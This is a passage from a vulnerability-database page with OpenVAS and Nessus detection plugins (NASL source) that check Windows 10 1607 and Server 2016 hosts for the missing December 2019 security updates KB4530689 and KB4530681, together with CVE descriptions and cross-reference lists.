DATABASE RESOURCES PRICING ABOUT US

{"id": "OPENVAS:1361412562310815862", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530689)", "description": "This host is missing a critical security\n update according to Microsoft KB4530689", "published": "2019-12-11T00:00:00", "modified": "2020-07-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815862", "reporter": "Copyright (C) 2019 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-us/help/4530689"], "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "immutableFields": [], "lastseen": "2020-07-21T20:40:51", "viewCount": 92, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1573", "CPAI-2019-1574", "CPAI-2019-1580"]}, {"type": "cisa", "idList": ["CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-1458"]}, {"type": "cve", "idList": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"]}, {"type": "exploitdb", "idList": ["EDB-ID:47768"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:59C2617443989C6132DFE374DA608682"]}, {"type": "githubexploit", "idList": ["1896BBB2-2D7E-5A06-B7A9-42968CA73DE1", "C44E7954-53F4-592A-A1A3-8C6E6BEC599C", "E63F927D-FD49-50BE-A186-E588888DE48E"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7"]}, {"type": "kaspersky", "idList": ["KLA11616", "KLA11619", "KLA11862", "KLA11868"]}, {"type": "krebs", "idList": ["KREBS:537C1540357C1E3360A8168D22F44CB5", "KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-BROWSER-CHROME_OBJECT_CREATE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2019_1458_WIZARDOPIUM-"]}, {"type": "mscve", "idList": ["MS:CVE-2019-1453", "MS:CVE-2019-1458", "MS:CVE-2019-1465", "MS:CVE-2019-1466", "MS:CVE-2019-1467", "MS:CVE-2019-1468", "MS:CVE-2019-1469", "MS:CVE-2019-1470", "MS:CVE-2019-1472", "MS:CVE-2019-1474", "MS:CVE-2019-1476", "MS:CVE-2019-1484", "MS:CVE-2019-1485", "MS:CVE-2019-1488"]}, {"type": "mskb", "idList": ["KB4530677", "KB4530681", "KB4530684", "KB4530689", "KB4530691", "KB4530692", "KB4530695", "KB4530698", "KB4530702", "KB4530714", "KB4530715", "KB4530717", "KB4530719", "KB4530730", "KB4530734"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_DEC_4530681.NASL", "SMB_NT_MS19_DEC_4530684.NASL", "SMB_NT_MS19_DEC_4530689.NASL", "SMB_NT_MS19_DEC_4530691.NASL", "SMB_NT_MS19_DEC_4530695.NASL", "SMB_NT_MS19_DEC_4530702.NASL", "SMB_NT_MS19_DEC_4530714.NASL", "SMB_NT_MS19_DEC_4530715.NASL", "SMB_NT_MS19_DEC_4530717.NASL", "SMB_NT_MS19_DEC_4530734.NASL", "SMB_NT_MS19_DEC_INTERNET_EXPLORER.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815683", "OPENVAS:1361412562310815735", "OPENVAS:1361412562310815737", "OPENVAS:1361412562310815863", "OPENVAS:1361412562310815864", "OPENVAS:1361412562310815865", "OPENVAS:1361412562310815867", "OPENVAS:1361412562310817224"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155653", "PACKETSTORM:156651", "PACKETSTORM:159569"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:D1C46696E4E69F5182E6FECCD3884846"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "securelist", "idList": ["SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "symantec", "idList": ["SMNTC-111047", "SMNTC-111048", "SMNTC-111049", "SMNTC-111051", "SMNTC-111056", "SMNTC-111057", "SMNTC-111060", "SMNTC-111062", "SMNTC-111064", "SMNTC-111066", "SMNTC-111067", "SMNTC-111074", "SMNTC-111076", "SMNTC-111129"]}, {"type": "talos", "idList": ["TALOS-2019-0901"]}, {"type": "talosblog", "idList": ["TALOSBLOG:12856A82DEBDA69C67A87F8D8088BA8C", "TALOSBLOG:A51913DD094CF4C00A4B6C40275E22C3"]}, {"type": "thn", "idList": ["THN:2F8F4C57A4BFEE821BF1AB72DB36A273", "THN:592EF1422E531E5A7AD2804EA7E024CD"]}, {"type": "threatpost", "idList": ["THREATPOST:230DF95E70EB9C4F372C198798822D19", "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "THREATPOST:8A816F536308CF8DB9594CD95292E06E", "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683"]}, {"type": "trellix", "idList": ["TRELLIX:74FAC35289D6D61DCD4748FD57DC98A4"]}, {"type": "zdi", "idList": ["ZDI-19-1004", "ZDI-19-1007", "ZDI-19-1008"]}, {"type": "zdt", "idList": ["1337DAY-ID-34066", "1337DAY-ID-35039"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1573", "CPAI-2019-1574", "CPAI-2019-1580"]}, {"type": "cisa", "idList": ["CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cve", "idList": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"]}, {"type": "exploitdb", "idList": ["EDB-ID:47768"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:59C2617443989C6132DFE374DA608682"]}, {"type": "githubexploit", "idList": ["1896BBB2-2D7E-5A06-B7A9-42968CA73DE1", "C44E7954-53F4-592A-A1A3-8C6E6BEC599C", "E63F927D-FD49-50BE-A186-E588888DE48E"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886"]}, {"type": "kaspersky", "idList": ["KLA11616", "KLA11619", "KLA11862", "KLA11868"]}, {"type": "krebs", "idList": ["KREBS:537C1540357C1E3360A8168D22F44CB5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/"]}, {"type": "mscve", "idList": ["MS:CVE-2019-1458", "MS:CVE-2019-1465", "MS:CVE-2019-1467", "MS:CVE-2019-1468", "MS:CVE-2019-1469", "MS:CVE-2019-1472", "MS:CVE-2019-1474", "MS:CVE-2019-1476", "MS:CVE-2019-1484"]}, {"type": "mskb", "idList": ["KB4530730"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_DEC_4530681.NASL", "SMB_NT_MS19_DEC_4530689.NASL", "SMB_NT_MS19_DEC_4530691.NASL", "SMB_NT_MS19_DEC_4530695.NASL", "SMB_NT_MS19_DEC_4530702.NASL", "SMB_NT_MS19_DEC_4530734.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815683", "OPENVAS:1361412562310815735", "OPENVAS:1361412562310815737", "OPENVAS:1361412562310815863", "OPENVAS:1361412562310815864", "OPENVAS:1361412562310815865", "OPENVAS:1361412562310815867"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155653", "PACKETSTORM:156651"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D1C46696E4E69F5182E6FECCD3884846"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "securelist", "idList": ["SECURELIST:4F6413DE862444B5FA0B192AF22A042D"]}, {"type": "symantec", "idList": ["SMNTC-111076"]}, {"type": "talos", "idList": ["TALOS-2019-0901"]}, {"type": "talosblog", "idList": ["TALOSBLOG:12856A82DEBDA69C67A87F8D8088BA8C", "TALOSBLOG:A51913DD094CF4C00A4B6C40275E22C3"]}, {"type": "thn", "idList": ["THN:592EF1422E531E5A7AD2804EA7E024CD"]}, {"type": "threatpost", "idList": ["THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "THREATPOST:8A816F536308CF8DB9594CD95292E06E"]}, {"type": "zdi", "idList": ["ZDI-19-1004", "ZDI-19-1007", "ZDI-19-1008"]}, {"type": "zdt", "idList": ["1337DAY-ID-34066"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-1458", "epss": "0.974000000", "percentile": "0.998350000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1469", "epss": "0.000480000", "percentile": "0.150830000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1467", "epss": "0.517120000", "percentile": "0.969680000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1488", "epss": "0.000430000", "percentile": "0.073860000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1476", "epss": "0.000550000", "percentile": "0.208720000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1468", "epss": "0.032310000", "percentile": "0.896970000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1465", "epss": "0.016010000", "percentile": "0.854000000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1453", "epss": "0.001930000", "percentile": "0.552810000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1485", "epss": "0.019970000", "percentile": "0.870420000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1484", "epss": "0.013720000", "percentile": "0.842110000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1472", "epss": "0.000480000", "percentile": "0.150830000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1470", "epss": "0.000480000", "percentile": "0.150830000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1474", "epss": "0.000480000", "percentile": "0.150830000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1466", "epss": "0.016010000", "percentile": "0.854000000", "modified": "2023-03-15"}], "vulnersScore": 0.1}, "_state": {"dependencies": 1678957314, "score": 1683999172, "epss": 1678957426}, "_internal": {"score_hash": "dad33f77035ad17386d2de1fc732fec2"}, "pluginID": "1361412562310815862", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815862\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1476\", \"CVE-2019-1484\",\n \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530689)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530689\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530689\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32full.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3383\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdi32full.dll\",\n file_version:sysVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3383\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Windows : Microsoft Bulletins"}

{"nessus": [{"lastseen": "2023-05-25T14:31:59", "description": "The remote Windows host is missing security update 4530689.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1458)\n\n - An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530689: Windows 10 Version 1607 and Windows Server 2016 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530689.NASL", "href": "https://www.tenable.com/plugins/nessus/131927", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131927);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1476\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"MSKB\", value:\"4530689\");\n script_xref(name:\"MSFT\", value:\"MS19-4530689\");\n\n script_name(english:\"KB4530689: Windows 10 Version 1607 and Windows Server 2016 December 2019 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530689.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530689/windows-10-update-kb4530689\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5bbafadd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530689.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Uninitialized Variable Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530689');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530689])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:32:40", "description": "The remote Windows host is missing security update 4530681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530681: Windows 10 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530681.NASL", "href": "https://www.tenable.com/plugins/nessus/131925", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131925);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n 